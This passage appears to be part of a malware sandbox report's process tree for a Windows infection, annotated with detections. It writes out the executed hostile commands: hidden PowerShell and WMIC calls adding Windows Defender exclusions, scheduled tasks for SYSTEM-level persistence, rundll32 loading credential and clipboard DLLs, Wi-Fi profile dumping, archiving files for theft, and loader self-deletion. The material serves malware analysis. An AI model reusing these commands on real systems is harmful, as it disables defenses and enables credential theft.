8⤵
PID:3920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:5520

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
10⤵
PID:5204

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:5268

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:1748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:3712

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:6136

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 23:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe\" Wt /iyIdidkKWA 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:7144

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
6⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn biPxHmULFllsbMgnpt
7⤵
PID:6424

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn biPxHmULFllsbMgnpt
8⤵
PID:6428

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
2⤵
- Loads dropped DLL
PID:1852

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5140

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:5176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\938118698296_Desktop.zip' -CompressionLevel Optimal
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5720

C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe
"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
3⤵
PID:5720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
3⤵
PID:5420

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
3⤵
- Creates scheduled task(s)
PID:2192

C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe
"C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"
2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:5728

C:\Windows\system32\svchost.exe
svchost.exe
3⤵
PID:5812

C:\Windows\system32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
3⤵
PID:1860

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2544

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:1748

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
4⤵
PID:3312

C:\Windows\system32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
3⤵
PID:4952

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:3096

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
4⤵
PID:5624

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
4⤵
PID:5540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"
3⤵
PID:5256

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2956

C:\Windows\system32\timeout.exe
timeout /t 3
4⤵
- Delays execution with timeout.exe
PID:1116

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5848

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2712 -ip 2712
1⤵
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4328 -ip 4328
1⤵
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 328 -ip 328
1⤵
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5460 -ip 5460
1⤵
PID:5996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2808

C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
1⤵
PID:2888

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
1⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:1028

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6032

C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=0
1⤵
PID:2532

C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x250,0x254,0x258,0x230,0x25c,0xa26038,0xa26044,0xa26050
2⤵
PID:1468

C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"
2⤵
PID:1800

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream
3⤵
PID:6116

C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b4,0x2b8,0x2bc,0x2b0,0x2c0,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
4⤵
PID:5820

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized --lowered-browser
1⤵
PID:6760

C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
2⤵
PID:6796

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=1880 /prefetch:2
2⤵
PID:6996

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2004,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:3
2⤵
PID:7016

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2292,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:8
2⤵
PID:7116

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2704,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3088 /prefetch:8
2⤵
PID:3096

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3080,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3140 /prefetch:8
2⤵
PID:6160

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3096,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:8
2⤵
PID:5708

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3112,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3372 /prefetch:8
2⤵
PID:3384

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3120,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:8
2⤵
PID:5504

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3788,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:1
2⤵
PID:6344

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3804,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:1
2⤵
PID:6356

C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe Wt /iyIdidkKWA 385118 /S
1⤵
PID:6468

C:\Windows\SysWOW64\cmd.exe
